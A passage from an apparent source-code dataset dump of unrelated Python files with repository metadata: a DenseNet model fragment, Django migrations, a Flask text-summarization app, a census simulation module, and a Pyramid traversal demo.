x_cat = torch.cat(x,1)
x_norm = getattr(self, 'norm{}'.format(i))(x_cat)
out = getattr(self, 'gate{}'.format(i))(x_cat, x_norm)
return x_cat
class _Transition(nn.Sequential):
def __init__(self, num_input_features, tr_features):
super(_Transition, self).__init__()
self.norm = nn.BatchNorm2d(tr_features)
self.relu = nn.ReLU(inplace=True)
self.conv = nn.Conv2d(tr_features, num_input_features // 2,
kernel_size=1, stride=1, bias=False)
self.pool = nn.AvgPool2d(kernel_size=2, stride=2)
def forward(self, x):
# out = torch.cat(x,1)
out = self.norm(x)
out = self.relu(out)
out = self.conv(out)
out = self.pool(out)
return out
class DenseNet(nn.Module):
def __init__(self, growth_rate=12,
num_init_features=24, num_classes=10, is_bottleneck=True, layer=28):
super(DenseNet, self).__init__()
if layer is 28:
block_config=[4,4,4]
elif layer is 40:
block_config=[6,6,6]
elif layer is 52:
block_config=[8,8,8]
elif layer is 64:
block_config=[10,10,10]
if is_bottleneck:
Block = _Bottleneck
else:
Block = _Basic
block_config = [2*x for x in block_config]
self.features = nn.Sequential()
self.features.add_module('conv0', nn.Conv2d(3, num_init_features, kernel_size=3, stride=1, padding=1, bias=False))
num_features = num_init_features
for i in range(len(block_config)):
self.features.add_module('layer%d' % (i + 1), _DenseLayer(num_features, growth_rate, block_config[i], Block))
tr_features = num_features + block_config[i] * growth_rate
num_features = num_features + block_config[i] * growth_rate // 2
if i != len(block_config) - 1:
self.features.add_module('transition%d' % (i + 1), _Transition(num_features, tr_features))
num_features = num_features // 2
# Final batch norm
self.norm = nn.BatchNorm2d(tr_features)
self.relu = nn.ReLU(inplace=True)
self.pool = nn.AvgPool2d(kernel_size=8, stride=1)
self.fc = nn.Linear(tr_features, num_classes)
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight)
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.Linear):
nn.init.constant_(m.bias, 0)
# Linear layer
# Official init from torch repo.
def forward(self, x):
out = self.features(x)
# out = torch.cat(out,1)
out = self.norm(out)
out = self.relu(out)
out = self.pool(out)
out = out.view(out.size(0), -1)
out = self.fc(out)
return out
if __name__=='__main__':
x = torch.randn(4,3,32,32)
model = DenseNet(growth_rate=12, num_init_features=24, num_classes=10, is_bottleneck=True, layer=40)
y = model(x)
print(y.size()) | [
"[email protected]"
]
| |
03ff755a26f0ca8650026e3ea508c2e1a76f5a1c | 73e4f50d2aabaf630e3a6154f3a149f6dee22656 | /apps/users/migrations/0003_auto_20170124_1008.py | 57a0420da15f1ec3aac5a6b35f833671e6d0a2c2 | []
| no_license | gjw199513/Mxonline | 508f8878eba396de1a88903c148a2f32641d9d8f | 360b759a0d21d712f3588c6fec377aabc2f990e0 | refs/heads/master | 2022-11-28T14:25:19.268436 | 2017-12-22T09:23:01 | 2017-12-22T09:23:31 | 80,403,072 | 4 | 2 | null | null | null | null | UTF-8 | Python | false | false | 491 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-01-24 10:08
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('users', '0002_auto_20170124_1007'),
]
operations = [
migrations.AlterField(
model_name='userprofile',
name='mobile',
field=models.CharField(blank=True, default=None, max_length=11, null=True),
),
]
| [
"gjw605134015"
]
| gjw605134015 |
cb17300b448fc5e8bf2a11a3c0e264dee6949afd | 20250e3dee97220e908d48e4a0d09fe1cbbf0ec0 | /app/migrations/0014_grupos.py | b7fd3449055bee2774d218416474b149b04ea48f | []
| no_license | sergio200086/Sistema-academico | 3e7af83301ddc7f380d03bad74485712b39b9aa6 | 70d03a67de6b72dff738560118f620c2fe7b016f | refs/heads/master | 2023-07-25T19:59:05.610314 | 2021-09-03T17:04:29 | 2021-09-03T17:04:29 | 402,836,941 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 831 | py | # Generated by Django 3.2 on 2021-05-18 19:57
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('app', '0013_profesores'),
]
operations = [
migrations.CreateModel(
name='Grupos',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('codigogrupo', models.CharField(max_length=50)),
('asignatura', models.CharField(max_length=50)),
('semestre', models.CharField(max_length=50)),
('profesorgrupo', models.ForeignKey(null=True, on_delete=django.db.models.deletion.PROTECT, related_name='profesorgrupo', to='app.profesores')),
],
),
]
| [
"[email protected]"
]
| |
c209bbaacb59462c92f86852c6966232dfbf4d38 | 2c3404d57a64e52bb860b59445e48a6cf4537bc6 | /backend/services/migrations/0003_auto_20210502_1837.py | d5b91cd5d6d2ba633c5270a8f3f6263dbe68ffd6 | []
| no_license | miyou995/octosite | 42ef627c0d8378b007d9bad1333768428cc6ec2e | 362f5013a48fb7cd54a4cae84aed58da8fbb4388 | refs/heads/master | 2023-07-07T10:21:52.985355 | 2021-08-05T07:36:04 | 2021-08-05T07:36:04 | 392,947,907 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,306 | py | # Generated by Django 3.0.7 on 2021-05-02 17:37
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('services', '0002_auto_20210502_1438'),
]
operations = [
migrations.CreateModel(
name='ServiceCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200, verbose_name='Nom Catégorie')),
('slug', models.SlugField(max_length=200, unique=True, verbose_name='Slug')),
('description', models.CharField(max_length=400)),
('icon_url', models.CharField(max_length=250)),
],
options={
'verbose_name': 'Catégorie',
'verbose_name_plural': 'Catégories',
'ordering': ('name',),
},
),
migrations.AlterField(
model_name='service',
name='category',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='services.ServiceCategory', verbose_name='Catégorie'),
),
migrations.DeleteModel(
name='Category',
),
]
| [
"[email protected]"
]
| |
0acae82186a9621c166aec6bb0d254ebb92b1f81 | 818dae742767ca890779c208d0e71292c9c688c8 | /app.py | ee11cfae74e172e2a4288e1f931afd1cc7937f75 | []
| no_license | mnassrib/text-summarizer-app | f128eda50b2dfa620f6f6bba46942ecb487c5f2f | 3c97606497dc9e933ee0bb086a58be3cb4a678f1 | refs/heads/master | 2022-07-28T18:01:28.673292 | 2020-05-19T23:53:08 | 2020-05-19T23:53:08 | 265,273,408 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,995 | py | from __future__ import unicode_literals
from flask import Flask, render_template, url_for, request
from spacy_summarization import text_summarizer
from gensim.summarization import summarize
from nltk_summarization import nltk_summarizer
import time
import spacy
import en_core_web_sm
nlp = en_core_web_sm.load()
app = Flask(__name__)
# Web Scraping Pkg
from bs4 import BeautifulSoup
from urllib.request import urlopen
#from urllib import urlopen
# Sumy Pkg
from sumy.parsers.plaintext import PlaintextParser
from sumy.nlp.tokenizers import Tokenizer
from sumy.summarizers.lex_rank import LexRankSummarizer
# Sumy
def sumy_summary(docx):
parser = PlaintextParser.from_string(docx,Tokenizer("english"))
lex_summarizer = LexRankSummarizer()
summary = lex_summarizer(parser.document,3)
summary_list = [str(sentence) for sentence in summary]
result = ' '.join(summary_list)
return result
# Reading Time
def readingTime(mytext):
total_words = len([ token.text for token in nlp(mytext)])
estimatedTime = total_words/200.0
return estimatedTime
# Fetch Text From Url
def get_text(url):
page = urlopen(url)
soup = BeautifulSoup(page)
fetched_text = ' '.join(map(lambda p:p.text,soup.find_all('p')))
return fetched_text
@app.route('/')
def index():
return render_template('index.html')
@app.route('/analyze', methods=['GET','POST'])
def analyze():
start = time.time()
if request.method == 'POST':
rawtext = request.form['rawtext']
final_reading_time = "{:.3f}".format(readingTime(rawtext))
final_summary = text_summarizer(rawtext)
summary_reading_time = "{:.3f}".format(readingTime(final_summary))
end = time.time()
final_time = "{:.3f}".format(end-start)
return render_template('index.html',ctext=rawtext,final_summary=final_summary,final_time=final_time,final_reading_time=final_reading_time,summary_reading_time=summary_reading_time)
@app.route('/analyze_url', methods=['GET','POST'])
def analyze_url():
start = time.time()
if request.method == 'POST':
raw_url = request.form['raw_url']
rawtext = get_text(raw_url)
final_reading_time = "{:.3f}".format(readingTime(rawtext))
final_summary = text_summarizer(rawtext)
summary_reading_time = "{:.3f}".format(readingTime(final_summary))
end = time.time()
final_time = "{:.3f}".format(end-start)
return render_template('index.html',ctext=rawtext,final_summary=final_summary,final_time=final_time,final_reading_time=final_reading_time,summary_reading_time=summary_reading_time)
@app.route('/compare_summary')
def compare_summary():
return render_template('compare_summary.html')
@app.route('/comparer', methods=['GET','POST'])
def comparer():
start = time.time()
if request.method == 'POST':
rawtext = request.form['rawtext']
final_reading_time = "{:.3f}".format(readingTime(rawtext))
final_summary_spacy = text_summarizer(rawtext)
summary_reading_time = "{:.3f}".format(readingTime(final_summary_spacy))
# Gensim Summarizer
final_summary_gensim = summarize(rawtext)
summary_reading_time_gensim = "{:.3f}".format(readingTime(final_summary_gensim))
# NLTK
final_summary_nltk = nltk_summarizer(rawtext)
summary_reading_time_nltk = "{:.3f}".format(readingTime(final_summary_nltk))
# Sumy
final_summary_sumy = sumy_summary(rawtext)
summary_reading_time_sumy = "{:.3f}".format(readingTime(final_summary_sumy))
end = time.time()
final_time = "{:.3f}".format(end-start)
return render_template('compare_summary.html',ctext=rawtext,final_summary_spacy=final_summary_spacy,final_summary_gensim=final_summary_gensim,final_summary_nltk=final_summary_nltk,final_time=final_time,final_reading_time=final_reading_time,summary_reading_time=summary_reading_time,summary_reading_time_gensim=summary_reading_time_gensim,final_summary_sumy=final_summary_sumy,summary_reading_time_sumy=summary_reading_time_sumy,summary_reading_time_nltk=summary_reading_time_nltk)
@app.route('/about')
def about():
return render_template('index.html')
if __name__ == '__main__':
app.run(debug=True) | [
"[email protected]"
]
| |
5f521276c2d1adbf2aab4331c07f24c57d0c44ad | 53a1e00175aad8bb9bc9d93c47a3e12eeffb7c67 | /account/migrations/0038_auto_20200917_0120.py | 607a62545d691cc8c088b0f011d46c375bd3a602 | []
| no_license | mirsisir/flash | c363d748725ebf4c5bbce9f03cbaafe32f768e9e | 42d73be32fd29ab4592ccaca3c03b786223fc902 | refs/heads/master | 2022-12-26T08:02:54.927235 | 2020-10-03T08:32:24 | 2020-10-03T08:32:24 | 300,835,641 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 353 | py | # Generated by Django 3.0.8 on 2020-09-17 01:20
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('account', '0037_auto_20200917_0100'),
]
operations = [
migrations.AlterModelOptions(
name='order',
options={'ordering': ('-order_date1',)},
),
]
| [
"[email protected]"
]
| |
af2ce57e29ae463e1877eb93020a815ea4ffd575 | 921a8ebd5add1cd15db7e558801bf6f5167073d7 | /hq.py | d9093527875528007031eec0e0b09be2fde29b71 | []
| no_license | ONSdigital/FOCUS | 768a5713ec8909cbcdb6b6af882879dda0647576 | d6920bf036abb49872a1f4908fdfdff8135c0f68 | refs/heads/master | 2021-09-03T20:02:07.212625 | 2017-11-13T16:39:54 | 2017-11-13T16:39:54 | 50,437,640 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 8,091 | py | """Module used to store the classes and other code related to any aspect of the census hq operation"""
import output_options as oo
import helper as h
import datetime
from simpy.util import start_delayed
import math
def ret_rec(household, rep):
# print out every 100000 returns?
#if rep.total_responses % 100000 == 0:
#print(rep.total_responses)
if oo.record_active_summary:
# add household to summary of responses
for key, value in rep.active_summary.items():
value[str(getattr(household, key))][math.floor(rep.env.now / 24)] += 1
for key, value in rep.active_totals.items():
value[str(getattr(household, key))] += 1
if oo.record_active_paper_summary and not household.digital:
for key, value in rep.active_paper_summary.items():
value[str(getattr(household, key))][math.floor(rep.env.now / 24)] += 1
for key, value in rep.active_paper_totals.items():
value[str(getattr(household, key))] += 1
household.return_received = True
if oo.record_return_received:
rep.output_data['Return_received'].append(oo.generic_output(rep.reps,
household.district.district,
household.la,
household.lsoa,
household.digital,
household.hh_type,
household.hh_id,
rep.env.now))
# currently every return gets counted as a response as soon as it is received - this may need to change
household.responded = True
rep.total_responses += 1
household.district.total_responses += 1
# check size of output data - if over an amount, size or length write to file?
if oo.record_responded:
rep.output_data['Responded'].append(oo.generic_output(rep.reps,
household.district.district,
household.la,
household.lsoa,
household.digital,
household.hh_type,
household.hh_id,
rep.env.now))
# checks size of output and writes to file if too large
if (h.dict_size(rep.output_data)) > rep.max_output_file_size:
h.write_output(rep.output_data, rep.output_path, rep.run)
yield rep.env.timeout(0)
# so returned and we know it! remove from simulation??
class Adviser(object):
"""Call centre adviser"""
def __init__(self, rep, id_num, input_data, ad_type):
self.rep = rep
self.id_num = id_num
self.input_data = input_data
self.type = ad_type
# date range in datetime format
self.start_date = datetime.datetime.strptime(self.input_data['start_date'], '%Y, %m, %d').date()
self.end_date = datetime.datetime.strptime(self.input_data['end_date'], '%Y, %m, %d').date()
# date range in simpy format
self.start_sim_time = h.get_entity_time(self, "start") # the sim time the adviser starts work
self.end_sim_time = h.get_entity_time(self, "end") # the sim time the adviser ends work
# time range - varies by day of week
self.set_avail_sch = input_data['availability']
class LetterPhase(object):
def __init__(self, env, rep, district, input_data, letter_type):
self.env = env
self.rep = rep
self.district = district
self.input_data = input_data
self.letter_type = letter_type
self.blanket = h.str2bool(self.input_data["blanket"])
self.targets = self.input_data["targets"]
self.start_sim_time = h.get_event_time(self)
self.period = self.input_data["period"]
# add process to decide who to send letters too...but with a delay
start_delayed(self.env, self.fu_letter(), self.start_sim_time)
def fu_letter(self):
temp_letter_list = [household for household in self.district.households
if (not self.blanket and household.hh_type in self.targets and not household.responded) or \
(self.blanket and household.hh_type in self.targets)]
# order by priority
temp_letter_list.sort(key=lambda hh: hh.priority, reverse=False)
for i in range(self.period):
current_letter_day = temp_letter_list[i::self.period]
for household in current_letter_day:
add_delay = i * 24
if self.letter_type == 'pq':
household.paper_allowed = True
if oo.record_paper_summary:
# add to the summary of the amount of paper given
for key, value in self.rep.paper_summary.items():
value[str(getattr(household, key))][math.floor((self.env.now + add_delay) / 24)] += 1
for key, value in self.rep.paper_totals.items():
value[str(getattr(household, key))] += 1
self.env.process(self.co_send_letter(household, self.letter_type, self.input_data["delay"] + add_delay))
yield self.env.timeout(0)
def co_send_letter(self, household, letter_type, delay):
if oo.record_letters:
self.rep.output_data[letter_type + '_sent'].append(oo.generic_output(self.rep.reps,
household.district.district,
household.la,
household.lsoa,
household.digital,
household.hh_type,
household.hh_id,
self.env.now))
yield self.env.timeout(delay)
self.env.process(household.receive_reminder(letter_type))
def schedule_paper_drop(obj, contact_type, reminder_type, delay):
# add to summary of paper given out
if reminder_type == 'pq' and oo.record_paper_summary:
for key, value in obj.rep.paper_summary.items():
value[str(getattr(obj, key))][math.floor(obj.rep.env.now / 24)] += 1
for key, value in obj.rep.paper_totals.items():
value[str(getattr(obj, key))] += 1
output_type = contact_type + "_" + reminder_type + "_posted" # use this as output key
if oo.record_posted:
obj.rep.output_data[output_type].append(oo.generic_output(obj.rep.reps,
obj.district.district,
obj.la,
obj.lsoa,
obj.digital,
obj.hh_type,
obj.hh_id,
obj.env.now))
if delay > 0:
start_delayed(obj.env, obj.receive_reminder(reminder_type), delay)
else:
obj.env.process(obj.receive_reminder(reminder_type))
yield obj.env.timeout(0)
| [
"[email protected]"
]
| |
c35827798e41b221d01c7605547d9563c1b93e01 | c040de12811afa588a23ad6c0cd4fdc849ab469f | /saklient/cloud/errors/usernotspecifiedexception.py | 4bd94f412d92c987223a12491a2dad83d3c4cda1 | [
"MIT"
]
| permissive | toshitanian/saklient.python | 3707d1113744122c5ab1ae793f22c6c3a0f65bc4 | 287c56915dd825d676eddc538cbb33b483803dc2 | refs/heads/master | 2021-05-28T08:13:16.851101 | 2014-10-09T09:54:03 | 2014-10-09T09:54:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 790 | py | # -*- coding:utf-8 -*-
from ...errors.httpforbiddenexception import HttpForbiddenException
# module saklient.cloud.errors.usernotspecifiedexception
class UserNotSpecifiedException(HttpForbiddenException):
## 要求された操作は許可されていません。このAPIはユーザを特定できる認証方法でアクセスする必要があります。
## @param {int} status
# @param {str} code=None
# @param {str} message=""
def __init__(self, status, code=None, message=""):
super(UserNotSpecifiedException, self).__init__(status, code, "要求された操作は許可されていません。このAPIはユーザを特定できる認証方法でアクセスする必要があります。" if message is None or message == "" else message)
| [
"[email protected]"
]
| |
81f5eb7112b4fddb2b1def7dd9e93b220c6f3982 | 06905fd703d600f95f7a21dfe8e102b26df05921 | /mmsite/wsgi.py | eeab6b532485c7681a3e40ee26925807b14b17ee | []
| no_license | NmrTannhauser/marketmaker | 5fa722962b7a3300967378970ddb9d572d254b38 | 87761de0187b1ae65236d7f968eaeb9a43f23c07 | refs/heads/master | 2020-03-14T16:35:28.388404 | 2018-05-28T16:14:41 | 2018-05-28T16:14:41 | 131,701,070 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 390 | py | """
WSGI config for mmsite project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "mmsite.settings")
application = get_wsgi_application()
| [
"[email protected]"
]
| |
71c9b1d33046a6ad3c060c4f3e76ee5cf4280b26 | 36073b3c349eb6887a03b8f90b39ebd54fa3deb3 | /cadastros/urls.py | 225b7457bf5f7a4bb5dc7949f740bd6c6c5f567f | []
| no_license | evertonpauli/e-ticket | 6ba29a3d4a0b3dc2841a5db470e2c717315e8450 | 066cf48e70dec425aeaaa7aeefd617ffd1616307 | refs/heads/master | 2023-04-30T10:54:13.013547 | 2019-08-15T13:12:45 | 2019-08-15T13:12:45 | 202,204,800 | 0 | 0 | null | 2023-04-21T20:36:51 | 2019-08-13T18:42:22 | Python | UTF-8 | Python | false | false | 328 | py | from rest_framework import routers
from cadastros.views import ClientesViewSet, CategoriaViewSet, StatusViewSet
router = routers.DefaultRouter(trailing_slash=True)
router.register('clientes', ClientesViewSet)
router.register('categorias', CategoriaViewSet)
router.register('status', StatusViewSet)
urlpatterns = router.urls
| [
"[email protected]"
]
| |
1f1e7a0b4abdeaaf41b0249eee3816924a031f17 | d732fb0d57ec5430d7b15fd45074c555c268e32c | /misc/traversal_basics/trav10.py | a31652b349cd80bc1656caffb5760ac4bffff3db | []
| no_license | askobeldin/mypython3 | 601864997bbebdabb10809befd451490ffd37625 | 8edf58311a787f9a87330409d9734370958607f1 | refs/heads/master | 2020-04-12T08:01:16.893234 | 2018-02-01T18:23:23 | 2018-02-01T18:23:23 | 60,504,448 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,373 | py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
#
################################################################################
try:
from collections import OrderedDict
except ImportError:
from ordereddict import OrderedDict
from string import Template
from wsgiref.simple_server import make_server
from pyramid.config import Configurator
from pyramid.response import Response
from pyramid.location import lineage
"""
from pyramid.httpexceptions import HTTPFound
#################################
# make a new Document
#
title = appstruct['title']
body = appstruct['body']
name = str(randint(0, 999999))
new_document = Document(name, self.context, title, body)
self.context[name] = new_document
######################################
# Redirect to the new document
#
url = self.request.resource_url(new_document)
return HTTPFound(location=url)
"""
class Folder(OrderedDict):
def __init__(self, name, parent, title):
super(Folder, self).__init__()
self.__name__ = name
self.__parent__ = parent
self.title = title
class Document(object):
def __init__(self, name, parent, title, body):
self.__name__ = name
self.__parent__ = parent
self.title = title
self.body = body
class SiteFolder(Folder):
pass
class Collector(Folder):
def __init__(self, *args, **kwds):
super(Collector, self).__init__(*args, **kwds)
self.toysList = []
class Toy(object):
__slots__ = ('__name__', '__parent__',
'title', 'description', 'tag')
def __init__(self, data, parent):
self.__name__ = data['title']
self.__parent__ = parent
self.title = data['title']
self.description = data['description']
self.tag = data['tag']
class SimpleDB(OrderedDict):
def __init__(self, name, parent, title):
super(SimpleDB, self).__init__()
self.__name__ = name
self.__parent__ = parent
self.title = title
def __getitem__(self, key):
print 'need key = %s' % key
try:
item = super(SimpleDB, self).__getitem__(key)
except KeyError:
print 'Key %s error!' % (key,)
print 'Generating new Bear toy with key %s' % (key,)
newtoy = {'title': u'Generated Bear %s' % (key,),
'description': u'Generated description for Bear %s' % (key,),
'tag': u'bears'}
item = Toy(data = newtoy,
parent = switchcollector[newtoy['tag']])
# save generated toy
self[key] = item
# update collector for Bears
collector1.toysList.insert(0, key)
return item
def __setitem__(self, key, value):
print 'saving %s to key %s' % (value, key)
super(SimpleDB, self).__setitem__(key, value)
def get_root(request):
return RTREE
def view_site(context, request):
s = Template("""
<!DOCTYPE html>
<html>
<head>
<title>Site folder</title>
</head>
<body>
<h3>title: $title</h3>
<p>Leaves: $keys</p>
</body>
</html>
""")
output = s.safe_substitute(title = context.title,
keys = getFolderLeaves(request))
return Response(body=output,
charset='utf-8',
content_type='text/html',
content_language='ru')
def view_folder(context, request):
s = Template("""
<!DOCTYPE html>
<html>
<head>
<title>Folder $name</title>
</head>
<body>
<p>BC: $breadcrumbs</p>
<hr>
<h3>title: $title</h3>
<hr>
<p>Leaves: $keys</p>
</body>
</html>
""")
output = s.safe_substitute(breadcrumbs = getBreadCrumbs(request),
name = context.__name__,
title = context.title,
keys = getFolderLeaves(request))
return Response(body=output,
charset='utf-8',
content_type='text/html',
content_language='ru')
def view_collector(context, request):
s = Template("""
<!DOCTYPE html>
<html>
<head>
<title>Collector $name</title>
</head>
<body>
<p>BC: $breadcrumbs</p>
<hr>
<h3>title: $title</h3>
<hr>
<h3>Toys:</h3>
$toys
</body>
</html>
""")
output = s.safe_substitute(breadcrumbs = getBreadCrumbs(request),
name = context.__name__,
title = context.title,
toys = getToysTableLinks(context, request))
return Response(body=output,
charset='utf-8',
content_type='text/html',
content_language='ru')
def view_doc(context, request):
s = Template("""
<!DOCTYPE html>
<html>
<head>
<title>Document $name</title>
</head>
<body>
<p>BC: $breadcrumbs</p>
<hr>
<h3>title: $title</h3>
<p>body: $body</p>
<hr>
</body>
</html>
""")
output = s.safe_substitute(breadcrumbs = getBreadCrumbs(request),
name = context.__name__,
title = context.title,
body = context.body)
return Response(body=output,
charset='utf-8',
content_type='text/html',
content_language='ru')
def view_db(context, request):
s = Template("""
<!DOCTYPE html>
<html>
<head>
<title>Database $name</title>
</head>
<body>
<p>BC: $breadcrumbs</p>
<hr>
<h3>title: $title</h3>
<hr>
</body>
</html>
""")
output = s.safe_substitute(breadcrumbs = getBreadCrumbs(request),
name = context.__name__,
title = context.title)
return Response(body=output,
charset='utf-8',
content_type='text/html',
content_language='ru')
def view_toy(context, request):
s = Template("""
<!DOCTYPE html>
<html>
<head>
<title>Toy $name</title>
</head>
<body>
<p>BC: $breadcrumbs</p>
<hr>
<h3>Title: $title</h3>
<h3>Tag: $tag</h3>
<h3>Description:</h3>
<p>$descr</p>
<hr>
</body>
</html>
""")
output = s.safe_substitute(breadcrumbs = getBreadCrumbs(request),
name = context.__name__,
title = context.title,
descr = context.description,
tag = context.tag)
return Response(body=output,
charset='utf-8',
content_type='text/html',
content_language='ru')
def getBreadCrumbs(request):
cr = [(request.resource_url(i), i.title) for i in lineage(request.context)]
cr.reverse()
li = ['<li>' + '<a href="' + i[0] + '">' + i[1] + '</a></li>'
for i in cr[:-1]]
#last item of breadcrumbs
li.append('<li>' + cr[-1][1] + '</li>')
return "<ul>" + "\n".join(li) + "</ul>"
def getFolderLeaves(request):
leaves = request.context.items()
li = ['<li>' + '<a href="' + request.resource_url(i[1]) + '">' + i[0] +
'</a></li>' for i in leaves]
return "<ul>" + "\n".join(li) + "</ul>"
def getToysList(collector):
if collector.toysList:
return collector.toysList
else:
return []
def getToysTable(collector):
table = u"""
<table>
<tbody>
<tr>
"""
lst = [table]
if collector.toysList:
for i in collector.toysList:
lst.append(u"<td>%s</td>" % i)
lst.append(u"</tr></tbody></table>")
return "".join(lst)
else:
return ""
def getToysTableLinks(collector, request):
table = u"""
<table>
<tbody>
<tr>
"""
lst = [table]
if collector.toysList:
for i in collector.toysList:
lst.append(u"<td><a href=\"/db/%s\">%s</a></td>" % (i, i))
lst.append(u"</tr></tbody></table>")
return "".join(lst)
else:
return ""
def fillCollector(collector, tag, db):
lst = []
data = db.items()
for (k, v) in data:
if v['tag'] == tag:
lst.append(k)
collector.toysList.extend(lst)
def printinfo(context, request):
# print request.__dict__
formatstring ='%-36s%s'
print formatstring % ('request.url', request.url)
print formatstring % ('request.host', request.host)
print formatstring % ('request.host_url', request.host_url)
print formatstring % ('request.application_url', request.application_url)
print formatstring % ('request.path_url', request.path_url)
print formatstring % ('request.path', request.path)
print formatstring % ('request.path_qs', request.path_qs)
print formatstring % ('request.query_string', request.query_string)
print 10 * '-'
# print formatstring % ('request.matchdict', request.matchdict)
### need a name attribute
# print formatstring % ('request.resource_url(context)', request.resource_url(context))
print formatstring % ('request.cookies', request.cookies)
print formatstring % ('request.headers', request.headers)
# print formatstring % ('request.json', request.json)
print formatstring % ('request.method', request.method)
print formatstring % ('request.charset', request.charset)
if request.params:
print formatstring % ('request.params', request.params)
print formatstring % ('request.params.keys()', request.params.keys())
print formatstring % ('request.params.items()', request.params.items())
# ошибка если передано несколько параметров age
# print formatstring % ('request.params.getone(\'age\')', request.params.getone('age'))
print formatstring % ('request.params.getall(\'age\')', request.params.getall('age'))
print 60 * '='
print 'context info'
print
for i in context:
print i, context[i]
print 60 * '='
print 'URL parameters'
################
# resources tree
#
RTREE = SiteFolder('', None, u'Site folder')
folder1 = Folder(u'f1', RTREE, u'Folder one')
RTREE[u'f1'] = folder1
folder2 = RTREE[u'f2'] = Folder(u'f2', RTREE, u'Folder two')
folder3 = RTREE[u'f3'] = Folder(u'f3', RTREE, u'Folder три')
folder4 = folder3[u'f4'] = Folder(u'f4', folder3, u'Folder #4')
d1 = Document(name=u'd1',
parent=folder1,
title=u'Testing document 1',
body=u'Body of testing document 1')
folder1[u'd1'] = d1
# main toys collector
collector = RTREE[u'toys'] = Folder(u'toys', RTREE, u'Toys')
collector1 = collector[u'bears'] = Collector(u'bears', collector, u'Bears')
collector2 = collector[u'dolls'] = Collector(u'dolls', collector, u'Dolls')
collector3 = collector[u'angels'] = Collector(u'angels', collector, u'Angels')
collector4 = collector[u'test'] = Collector(u'test', collector, u'Testing')
simpledb = RTREE[u'db'] = SimpleDB(u'db', RTREE, u'SimpleDB')
PSEUDO_DB = {
1: {'title': u'Bear 1', 'description': u'Description of Bear 1', 'tag': u'bears'},
2: {'title': u'Doll 2', 'description': u'Description of Doll 2', 'tag': u'dolls'},
3: {'title': u'Doll 3', 'description': u'Description of Doll 3', 'tag': u'dolls'},
4: {'title': u'Bear 4', 'description': u'Description of Bear 4', 'tag': u'bears'},
5: {'title': u'Doll 5', 'description': u'Description of Doll 5', 'tag': u'dolls'},
6: {'title': u'Angel 6', 'description': u'Description of Angel 6', 'tag': u'angels'},
7: {'title': u'Doll 7', 'description': u'Description of Doll 7', 'tag': u'dolls'},
8: {'title': u'Doll 8', 'description': u'Description of Doll 8', 'tag': u'dolls'},
9: {'title': u'Bear 9', 'description': u'Description of Bear 9', 'tag': u'bears'},
10: {'title': u'Angel 10', 'description': u'Description of Angel 10', 'tag': u'angels'},
11: {'title': u'Angel 11', 'description': u'Description of Angel 11', 'tag': u'angels'},
12: {'title': u'Angel 12', 'description': u'Description of Angel 12', 'tag': u'angels'},
13: {'title': u'Angel 13', 'description': u'Description of Angel 13', 'tag': u'angels'},
14: {'title': u'Bear 14', 'description': u'Description of Bear 14', 'tag': u'bears'},
15: {'title': u'Bear 15', 'description': u'Description of Bear 15', 'tag': u'bears'},
16: {'title': u'Angel 16', 'description': u'Description of Angel 16', 'tag': u'angels'},
17: {'title': u'Test 17', 'description': u'Description of Test 17', 'tag': u'test'},
18: {'title': u'Test 18', 'description': u'Description of Test 18', 'tag': u'test'},
19: {'title': u'Doll 19', 'description': u'Description of Doll 19', 'tag': u'dolls'},
20: {'title': u'Test 20', 'description': u'Description of Test 20', 'tag': u'test'},
21: {'title': u'Angel 21', 'description': u'Description of Angel 21', 'tag': u'angels'},
22: {'title': u'Bear 22', 'description': u'Description of Bear 22', 'tag': u'bears'},
23: {'title': u'Test 23', 'description': u'Description of Test 23', 'tag': u'test'},
24: {'title': u'Doll 24', 'description': u'Description of Doll 24', 'tag': u'dolls'},
25: {'title': u'Doll 25', 'description': u'Description of Doll 25', 'tag': u'dolls'},
26: {'title': u'Test 26', 'description': u'Description of Test 26', 'tag': u'test'},
27: {'title': u'Bear 27', 'description': u'Description of Bear 27', 'tag': u'bears'},
28: {'title': u'Test 28', 'description': u'Description of Test 28', 'tag': u'test'},
29: {'title': u'Angel 29', 'description': u'Description of Angel 29', 'tag': u'angels'},
30: {'title': u'Test 30', 'description': u'Description of Test 30', 'tag': u'test'},
31: {'title': u'Doll 31', 'description': u'Description of Doll 31', 'tag': u'dolls'},
}
###########################################################################
if __name__ == '__main__':
config = Configurator(root_factory=get_root)
config.add_view(view=view_site,
context=SiteFolder)
config.add_view(view=view_folder,
context=Folder)
config.add_view(view=view_collector,
context=Collector)
config.add_view(view=view_doc,
context=Document)
config.add_view(view=view_db,
context=SimpleDB)
config.add_view(view=view_toy,
context=Toy)
# filling collectors of toys
fillCollector(collector1, u'bears', PSEUDO_DB)
fillCollector(collector2, u'dolls', PSEUDO_DB)
fillCollector(collector3, u'angels', PSEUDO_DB)
fillCollector(collector4, u'test', PSEUDO_DB)
########################################
# initialize database
switchcollector = {u'bears': collector1,
u'dolls': collector2,
u'angels': collector3,
u'test': collector4}
